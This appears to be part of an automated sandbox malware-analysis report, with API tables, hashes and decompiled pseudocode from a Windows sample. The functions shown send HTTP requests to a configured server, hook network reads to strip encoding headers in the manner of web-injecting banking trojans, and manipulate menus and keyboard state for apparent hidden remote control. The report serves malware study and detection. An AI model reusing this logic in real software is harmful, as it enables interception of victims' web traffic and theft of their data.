0x0041b604
0x0041b4a8
0x0041b4ab
0x0041b4b5
0x0041b4b8
0x0041b4ba
0x0041b4c8
0x0041b4cd
0x0041b4cf
0x0041b4e6
0x0041b4e6
0x0041b4d1
0x0041b4df
0x0041b4df
0x0041b4eb
0x0041b4ef
0x0041b4f5
0x0041b4f8
0x0041b4fe
0x0041b505
0x0041b509
0x0041b50f
0x0041b513
0x0041b516
0x0041b518
0x0041b51d
0x0041b51d
0x0041b51d
0x0041b521
0x0041b524
0x0041b529
0x0041b52d
0x0041b531
0x00000000
0x00000000
0x0041b53d
0x0041b540
0x0041b54c
0x0041b55c
0x0041b567
0x0041b57a
0x0041b58a
0x0041b599
0x0041b59f
0x0041b5a5
0x0041b5a7
0x00000000
0x00000000
0x0041b5ae
0x0041b5b4
0x0041b5b7
0x0041b5b9
0x0041b5bc
0x0041b5c2
0x0041b5c8
0x0041b5ca
0x0041b5d3
0x0041b5d5
0x0041b5db
0x0041b5dd
0x0041b5e6
0x0041b5ec
0x0041b5f2
0x0041b5f4
0x0041b5f6
0x0041b5f6
0x0041b5f4
0x0041b5dd
0x0041b5fe
0x0041b5fe
0x0041b5b9
0x00000000
0x0041b4f8
0x0041b3c7
0x00000000

APIs

TlsAlloc.KERNEL32(?,0000018C,00000000,00000000), ref: 0041B3B9
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0041B3E3
CreateEventW.KERNEL32(004218A0,00000001,00000000,?,84889912,?,00000001), ref: 0041B40D
CreateMutexW.KERNEL32(004218A0,00000000,?,18782822,?,00000001), ref: 0041B430
CreateFileMappingW.KERNEL32(00000000,004218A0,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0041B45B
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0041B471
GetDC.USER32(00000000), ref: 0041B48E
GetDeviceCaps.GDI32(00000000,00000008), ref: 0041B4AE
GetDeviceCaps.GDI32(2937498D,0000000A), ref: 0041B4B8
CreateCompatibleBitmap.GDI32(2937498D,?,00000000), ref: 0041B4CB

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: efc97aef48d05a2ba345b83c4f9b5ba72bc2ab2a74b3a3deb2daa6fd6ed0fb0a
Instruction ID: 5a07a2fd5768b464474114a8ea0bc4745be46d350499e3e5b57c29659f8fdfff
Opcode Fuzzy Hash: efc97aef48d05a2ba345b83c4f9b5ba72bc2ab2a74b3a3deb2daa6fd6ed0fb0a
Instruction Fuzzy Hash: 11716071900648AFDB209FB1CD85EEBBBFCEB08304F50482EF952E2251D77999848B65

Uniqueness

Uniqueness Score: -1.00%

Function 00412C21 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 183
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00412C21(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t95;
				void* _t100;
				char* _t102;
				intOrPtr* _t110;
				void* _t114;
				intOrPtr* _t115;
				signed int _t121;
				void* _t123;

				_t123 = (_t121 & 0xfffffff8) - 0x224;
				_t110 = _a4;
				if(E0040D1C0( &_v532,  *((intOrPtr*)(_t110 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x421adc, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E0040868F(_v552);
					E0040868F(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t110;
				_t102 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t102 = "GET";
				}
				_t100 = HttpOpenRequestA(_v592, _t102, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t100;
				if(_t100 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E0041A08B(_t102,  &_v576);
					_t63 = 0xa;
					E00412ECF(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t95 = E004094DE( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t123 = _t123 + 0xc;
						if(_t95 > 0) {
							HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
							E0040868F(_v648);
						}
					}
					_t67 = 0xb;
					E00412ECF(_t67,  &_v596);
					_v628 = E00409301( &_v572);
					_t114 = E0040865F(2 + _t69 * 6);
					if(_t114 == 0) {
						_t114 = 0;
					} else {
						E0040D4EB(_t114,  &_v572, _v628);
						_t100 = _v628;
					}
					if(_t114 != 0 && E004094DE( &_v632,  &_v596, _t114) > 0) {
						HttpAddRequestHeadersA(_t100, _v632, 0xffffffff, 0xa0000000);
						E0040868F(_v648);
					}
					E0040868F(_t114);
					_t115 = _a4;
					if(HttpSendRequestA(_t100, 0, 0,  *( *_t115 + 0x24),  *( *_t115 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t100);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t100, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E0040A7CC( &_v668, _t100) != 0) {
								E0040868F(_t81);
							}
							E0040868F(_v656);
							E0040868F(_v656);
							 *((intOrPtr*)(_t115 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x00412c27
0x00412c30
0x00412c41
0x00412e4d
0x00412e55
0x00412e55
0x00412c53
0x00412c59
0x00412c5f
0x00412e3b
0x00412e3f
0x00412e48
0x00000000
0x00412e48
0x00412c74
0x00412c7a
0x00412c80
0x00412e31
0x00412e35
0x00000000
0x00412e35
0x00412c86
0x00412c8c
0x00412c91
0x00412c93
0x00412c93
0x00412cc9
0x00412ccb
0x00412cd1
0x00412e27
0x00412e2b
0x00000000
0x00412cd7
0x00412cdc
0x00412ce7
0x00412ce8
0x00412cf0
0x00412cf5
0x00412d02
0x00412d07
0x00412d0c
0x00412d1a
0x00412d24
0x00412d24
0x00412d0c
0x00412d2f
0x00412d30
0x00412d3e
0x00412d4c
0x00412d50
0x00412d68
0x00412d52
0x00412d5d
0x00412d62
0x00412d62
0x00412d6c
0x00412d91
0x00412d9b
0x00412d9b
0x00412da1
0x00412da6
0x00412dbd
0x00412e20
0x00412e21
0x00000000
0x00412dbf
0x00412dd0
0x00412dd8
0x00412de5
0x00000000
0x00412df1
0x00412dfd
0x00412e00
0x00412e00
0x00412e09
0x00412e12
0x00412e1b
0x00000000
0x00412e1b
0x00412de5
0x00412dbd

APIs

Part of subcall function 0040D1C0: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040D1EF

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00412C53
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00412C74
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00412CC3
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00412D1A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00412D91
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00412DB4
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00412DDC
InternetCloseHandle.WININET(00000000), ref: 00412E21
InternetCloseHandle.WININET(?), ref: 00412E2B

Part of subcall function 0040A7CC: InternetQueryOptionA.WININET(-00421228,00000022,00000000,?), ref: 0040A7E0
Part of subcall function 0040A7CC: GetLastError.KERNEL32 ref: 0040A7E6
Part of subcall function 0040A7CC: InternetQueryOptionA.WININET(00000022,00000022,00000000,?), ref: 0040A806

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

InternetCloseHandle.WININET(?), ref: 00412E35

Strings

GET, xrefs: 00412C93, 00412CBE
HTTP/1.1, xrefs: 00412CB5
POST, xrefs: 00412C8C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: 237e2cd259eed3b9bd2632f62fe2d4d51fe008c203e3fd49f880fc5edf8b1079
Instruction ID: a3efac3df3f1f8d924283194824af7a44c06e4e061c3b766a8e990e84629fab7
Opcode Fuzzy Hash: 237e2cd259eed3b9bd2632f62fe2d4d51fe008c203e3fd49f880fc5edf8b1079
Instruction Fuzzy Hash: 8751C172004301ABC711AF61CE44E9FBFA9EF88354F00092EF585E61B1DB79D954CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAB5 Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0041BAB5(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x421eb8);
					L23:
					SetEvent( *0x421eb4);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E00416025( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x421ea8, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x421eb8;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x0041bab5
0x0041babb
0x0041bac4
0x0041bac7
0x0041bc46
0x0041bc4c
0x0041bc52
0x0041bc60
0x0041bc60
0x0041bacd
0x0041bc15
0x0041bc21
0x0041bc31
0x0041bc35
0x0041bc39
0x00000000
0x0041badc
0x0041bae5
0x0041bae9
0x00000000
0x00000000
0x0041baef
0x0041baf5
0x0041bafb
0x0041bafd
0x0041bb08
0x0041bb2e
0x0041bb2e
0x0041bb33
0x0041bb49
0x0041bb4e
0x00000000
0x00000000
0x0041bb5d
0x0041bb65
0x0041bb67
0x0041bb67
0x0041bb77
0x0041bb81
0x0041bb97
0x0041bbe6
0x0041bbee
0x0041bbf7
0x00000000
0x00000000
0x0041bbf9
0x0041bc07
0x00000000
0x0041bc07
0x0041bbe8
0x00000000
0x0041bbe8
0x0041bba1
0x0041bba5
0x0041bbd6
0x0041bbd6
0x0041bba5
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bb0a
0x0041bb0a
0x0041bb15
0x0041bb1d
0x0041bb23
0x0041bb23
0x0041bb27
0x0041bb28
0x00000000
0x0041bb0a

APIs

GetMenu.USER32(?), ref: 0041BADF
GetMenuItemCount.USER32 ref: 0041BAF5
GetMenuState.USER32 ref: 0041BB0D
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0041BB1D
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0041BB43
GetMenuState.USER32 ref: 0041BB57
EndMenu.USER32 ref: 0041BB67
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0041BB77
GetSubMenu.USER32 ref: 0041BB9B
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0041BBB5
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041BBD6
GetMenuItemID.USER32(00000000,00000000), ref: 0041BBEE
SendMessageW.USER32(?,00000111,?,00000000), ref: 0041BC07
SetKeyboardState.USER32 ref: 0041BC46
SetEvent.KERNEL32 ref: 0041BC52

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 7029bf9d803381b94c740a9ba4660959e543a3df60d428d788f445f64ce141d7
Instruction ID: 4271bda6d534114491b7dd6b620c48b9590df49c2c8453638a1bdb7f698b6bb1
Opcode Fuzzy Hash: 7029bf9d803381b94c740a9ba4660959e543a3df60d428d788f445f64ce141d7
Instruction Fuzzy Hash: AC41EF30104304AFD7159F25DD48EAB3EE8EB84760F00062EF965A16F4DB748A82DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C38A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C38A() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t18;

				if( *0x42120c != 0) {
					L9:
					 *0x42120c =  *0x42120c + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x421208 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x4211f0 = GetProcAddress(_t2, "FCICreate");
						 *0x4211f8 = GetProcAddress( *0x421208, "FCIAddFile");
						 *0x420428 = GetProcAddress( *0x421208, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x421208, "FCIDestroy");
						 *0x421200 = _t7;
						if( *0x4211f0 == 0 ||  *0x4211f8 == 0) {
							L7:
							FreeLibrary( *0x421208);
							goto L8;
						} else {
							_t18 =  *0x420428; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x420424 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x0040c393
0x0040c43e
0x0040c43e
0x0040c447
0x0040c399
0x0040c39e
0x0040c3a4
0x0040c3ab
0x0040c43a
0x0040c43d
0x0040c3b1
0x0040c3cb
0x0040c3dd
0x0040c3ef
0x0040c3f4
0x0040c3f6
0x0040c402
0x0040c42e
0x0040c434
0x00000000
0x0040c40c
0x0040c40c
0x0040c412
0x00000000
0x0040c418
0x0040c41f
0x0040c425
0x0040c42c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c42c
0x0040c412
0x0040c402
0x0040c3ab

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040C471,?,0040C68C,?), ref: 0040C39E
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040C3BE
GetProcAddress.KERNEL32(FCIAddFile), ref: 0040C3D0
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040C3E2
GetProcAddress.KERNEL32(FCIDestroy), ref: 0040C3F4
HeapCreate.KERNEL32(00000000,00080000,00000000,?,0040C68C,?), ref: 0040C41F
FreeLibrary.KERNEL32(?,0040C68C,?), ref: 0040C434

Strings

FCIDestroy, xrefs: 0040C3E4
FCIFlushCabinet, xrefs: 0040C3D2
FCIAddFile, xrefs: 0040C3C0
cabinet.dll, xrefs: 0040C399
FCICreate, xrefs: 0040C3B8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: ca9fc9a44a240744a46199670a848b72972b8460d4faddb0dd1172967933d515
Instruction ID: ce3dcb912df7d8bc0998a24f9ad1d78c76c7d3985a32c69d3d01c1a84fa71916
Opcode Fuzzy Hash: ca9fc9a44a240744a46199670a848b72972b8460d4faddb0dd1172967933d515
Instruction Fuzzy Hash: 49113034B40700EAC7325F64BC8592A3EA5F3B87623A0877BF410F2670D7780482DA6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040644C Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040644C(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				void* __esi;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				void* _t118;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				signed int _t130;
				signed char _t132;
				signed char _t138;
				intOrPtr _t151;
				signed int _t166;
				void* _t172;
				intOrPtr _t180;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t200;
				signed int _t201;

				if(E00419F02() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					return  *0x4203b0(_a4, _a8, _a12);
				} else {
					EnterCriticalSection(0x4203c0);
					_t190 = _a4;
					_t184 = E0040551F(_a4);
					_v16 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x4203c0);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x4203dc;
					if( *((intOrPtr*)(_t186 + 0x20)) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *((intOrPtr*)(_t186 + 0x20)) - _t113;
						LeaveCriticalSection(0x4203c0);
						_t193 = _a4;
						_t114 =  *0x4203b0(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v12 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x4203c0);
							_t116 = E0040551F(_t193);
							__eflags = _t116 - 0xffffffff;
							if(_t116 != 0xffffffff) {
								_t166 = _v12;
								_t118 = _t116 * 0x38 +  *0x4203dc;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t118 + 0x24)) + _t166;
									_t92 = _t118 + 0x28;
									 *_t92 =  *(_t118 + 0x28) - 1;
									__eflags =  *_t92;
									_v12 = 1;
								} else {
									_t88 = _t118 + 0x1c; // -4326336
									_v12 =  *(_t118 + 0x28);
									E0040868F( *_t88);
									E00408730(_t88, 0x10);
								}
							} else {
								_v12 = _v12 | _t116;
								 *0x4203bc(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4203c0);
						}
						L36:
						return _v12;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x4203c0);
						_t195 = _a4;
						_t122 =  *0x4203b0(_a4, _a8, _a12);
						_v12 = _t122;
						__eflags = _t122 - 0xffffffff;
						if(_t122 != 0xffffffff) {
							EnterCriticalSection(0x4203c0);
							_t123 = E0040551F(_t195);
							__eflags = _t123 - 0xffffffff;
							if(_t123 != 0xffffffff) {
								_t172 = _t123 * 0x38 +  *0x4203dc;
								_t180 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v12 - _t180;
								if(_v12 > _t180) {
									E004055DB(_t123);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t180 - _v12;
								}
							} else {
								_v12 = _v12 | _t123;
								 *0x4203bc(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4203c0);
						}
						goto L36;
					}
					_t175 = _a8;
					_t127 = E004059F9(_a12, _a8,  &_v80, _t190);
					_v20 = _t127;
					if(_t127 != 0xffffffff) {
						__eflags = _v76;
						if(_v76 == 0) {
							L37:
							E00412BAA( &_v80);
							_t130 = _v20 + _a12;
							__eflags = _t130;
							 *(_t186 + 8) = _t130;
							goto L38;
						}
						_t132 = E00412302( &_v80);
						_v16 = _t132;
						__eflags = _t132 & 0x00000001;
						if((_t132 & 0x00000001) != 0) {
							E00412BAA( &_v80);
							LeaveCriticalSection(0x4203c0);
							return  *0x4203bc(0xffffe8a3, 0) | 0xffffffff;
						}
						_v8 = 0;
						_v12 = 0;
						__eflags = _t132 & 0x00000002;
						if(__eflags != 0) {
							_t201 = E004086E2(__eflags, _a8, _a12);
							_v8 = _t201;
							__eflags = _t201;
							if(_t201 != 0) {
								E00412BFC( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
								E0040868F( *(_t186 + 0x14));
								E0040868F( *((intOrPtr*)(_t186 + 4)));
								_t151 = E00408AEF(_v68, _v72);
								 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
								_t38 = _t186 + 0x18;
								 *_t38 =  *(_t186 + 0x18) & 0x00000000;
								__eflags =  *_t38;
								 *((intOrPtr*)(_t186 + 4)) = _t151;
								 *((intOrPtr*)(_t186 + 0xc)) = _v36;
								 *((intOrPtr*)(_t186 + 0x10)) = _v32;
								_v12 = E0040D688(E0040D688(E0040D704(_t201, _a12, "Accept-Encoding", "identity"), _t175, _t201, "TE"), _t175, _t201, "If-Modified-Since");
							} else {
								E00412BFC(_v32, _v36);
							}
						}
						__eflags = _v16 & 0x00000004;
						if((_v16 & 0x00000004) == 0) {
							L27:
							__eflags = _v8;
							if(_v8 == 0) {
								goto L37;
							}
							E00412BAA( &_v80);
							_t70 = _t186 + 0x24;
							 *_t70 =  *(_t186 + 0x24) & 0x00000000;
							__eflags =  *_t70;
							 *(_t186 + 8) = _v20;
							 *((intOrPtr*)(_t186 + 0x1c)) = _v8;
							 *((intOrPtr*)(_t186 + 0x20)) = _v12;
							 *(_t186 + 0x28) = _a12;
							goto L29;
						}
						_t200 = _v8;
						__eflags = _t200;
						if(__eflags != 0) {
							_t138 = _v12;
						} else {
							_t200 = _a8;
							_t138 = _a12;
						}
						_v16 = _t138;
						_v12 = E00405C9E(_v16, __eflags, _t200, _v44, _v40,  &_v8);
						E0040868F(_v44);
						__eflags = _v12;
						if(_v12 != 0) {
							__eflags = _t200 - _a8;
							if(_t200 != _a8) {
								E0040868F(_t200);
							}
						} else {
							__eflags = _t200 - _a8;
							if(_t200 == _a8) {
								goto L37;
							}
							_v8 = _t200;
							_v12 = _v16;
						}
						goto L27;
					} else {
						E004055DB(_v16);
						E00412BAA( &_v80);
						goto L8;
					}
				}
			}

0x0040645c
0x004064d0
0x00000000
0x0040646a
0x00406470
0x00406476
0x0040647e
0x00406480
0x00406486
0x004064c9
0x004064ca
0x00000000
0x004064ca
0x0040648b
0x00406495
0x0040664b
0x0040664b
0x00406657
0x00406659
0x00406661
0x00406665
0x0040666e
0x00406671
0x00406674
0x00406677
0x0040667d
0x00406682
0x00406685
0x0040669b
0x004066a1
0x004066a7
0x004066a9
0x004066c5
0x004066c8
0x004066c8
0x004066c8
0x004066cb
0x004066ab
0x004066ae
0x004066b3
0x004066b6
0x004066be
0x004066be
0x00406687
0x00406687
0x00406691
0x00406698
0x004066d3
0x004066d3
0x004066d9
0x00000000
0x004066d9
0x0040649f
0x004066f4
0x004066fb
0x00406700
0x00406707
0x00406710
0x00406713
0x00406716
0x00406719
0x0040671f
0x00406724
0x00406727
0x00406742
0x00406748
0x0040674b
0x0040674e
0x00406758
0x00406750
0x00406753
0x00406753
0x00406729
0x00406729
0x00406733
0x0040673a
0x0040675e
0x0040675e
0x00000000
0x00406716
0x004064a8
0x004064af
0x004064b4
0x004064ba
0x004064e9
0x004064ec
0x004066e1
0x004066e4
0x004066ef
0x004066ef
0x004066f1
0x00000000
0x004066f1
0x004064f6
0x004064fb
0x004064fe
0x00406500
0x00406505
0x0040650b
0x00000000
0x00406520
0x00406525
0x00406528
0x0040652b
0x0040652d
0x0040653e
0x00406540
0x00406543
0x00406545
0x0040655a
0x00406562
0x0040656a
0x00406575
0x0040657a
0x0040657e
0x0040657e
0x0040657e
0x00406587
0x00406595
0x0040659c
0x004065bc
0x00406547
0x0040654d
0x0040654d
0x00406545
0x004065bf
0x004065c3
0x0040661d
0x0040661d
0x00406621
0x00000000
0x00000000
0x0040662a
0x00406632
0x00406632
0x00406632
0x00406636
0x0040663c
0x00406642
0x00406648
0x00000000
0x00406648
0x004065c5
0x004065c8
0x004065ca
0x004065d4
0x004065cc
0x004065cc
0x004065cf
0x004065cf
0x004065d7
0x004065f0
0x004065f3
0x004065f8
0x004065fc
0x00406612
0x00406615
0x00406618
0x00406618
0x004065fe
0x004065fe
0x00406601
0x00000000
0x00000000
0x0040660a
0x0040660d
0x0040660d
0x00000000
0x004064bc
0x004064bf
0x004064c4
0x00000000
0x004064c4
0x004064ba

APIs

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

EnterCriticalSection.KERNEL32(004203C0), ref: 00406470
LeaveCriticalSection.KERNEL32(004203C0), ref: 004064CA
LeaveCriticalSection.KERNEL32(004203C0,?), ref: 0040650B
LeaveCriticalSection.KERNEL32(004203C0), ref: 00406659
EnterCriticalSection.KERNEL32(004203C0), ref: 00406677
LeaveCriticalSection.KERNEL32(004203C0), ref: 004066D3
LeaveCriticalSection.KERNEL32(004203C0), ref: 004066FB
EnterCriticalSection.KERNEL32(004203C0), ref: 00406719
LeaveCriticalSection.KERNEL32(004203C0), ref: 0040675E

Strings

Accept-Encoding, xrefs: 0040658D
If-Modified-Since, xrefs: 004065B0
identity, xrefs: 00406582

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: c6151e38058e1783e4b0971aa9db208011bd0fcf583fc16542e7930635c8b009
Instruction ID: 3bf9b56a8119e3b038cc2bb289e2b8a777fd947474f4fd91354b568d4c33abb0
Opcode Fuzzy Hash: c6151e38058e1783e4b0971aa9db208011bd0fcf583fc16542e7930635c8b009
Instruction Fuzzy Hash: 34A16E71900219EFCB10EF64DD45A9EBBB4FF04314F21866AE816B7291C739AA61CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B60D Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B60D(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
